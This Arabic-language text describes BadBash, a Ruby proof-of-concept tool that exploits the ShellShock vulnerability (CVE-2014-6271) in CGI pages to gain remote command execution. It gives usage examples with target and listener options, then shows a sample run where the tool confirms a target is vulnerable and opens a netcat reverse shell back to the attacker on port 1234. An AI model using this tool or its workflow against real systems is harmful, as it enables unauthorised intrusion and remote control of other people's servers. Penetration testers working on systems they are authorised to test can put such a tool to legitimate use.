
أداة إثبات المفهوم (PoC) لاستغلال CVE-2014-6271 (ShellShock) لتنفيذ الأوامر عن بُعد (RCE)
أداة إثبات المفهوم لثغرة RCE CVE-2014-6271 (ShellShock)
======= BadBash هي أداة استغلال ثغرة RCE CVE-2014-6271. النسخة الأساسية تفحص فقط موقع CGI عبر HTTP وتوفر فقط شل عكسي عبر netcat على المنفذ 1234.
المطور: Andy Yang الإصدار: 0.1.0 الترخيص: GPLv3
المشروع الأصلي على GitHub: https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - أداة RCE لثغرة CVE-2014-6271 بواسطة Andy Yang النسخة الأساسية تفحص فقط مواقع HTTP النسخة الأساسية توفر فقط شل عكسي عبر netcat على المنفذ 1234
مثال الاستخدام:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path المسار الكامل لصفحة CGI
-d, --Destination IP عنوان IP الخاص بك الذي يستمع للاتصالات الواردة
-h, --help عرض المساعدة
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] جارٍ التحقق مما إذا كان الهدف ضعيفًا........
[Info] قد يستغرق هذا ما يصل إلى 10 ثوان........
[Info] الهدف ضعيف!!!
[Info] يُرجى استخدام NC للاستماع على المنفذ 1234 للحصول على شل عكسي..........
[Info] جارٍ استغلال الثغرة للحصول على شل عكسي للاتصال بـ 172.16.189.1:1234 عبر netcat ..........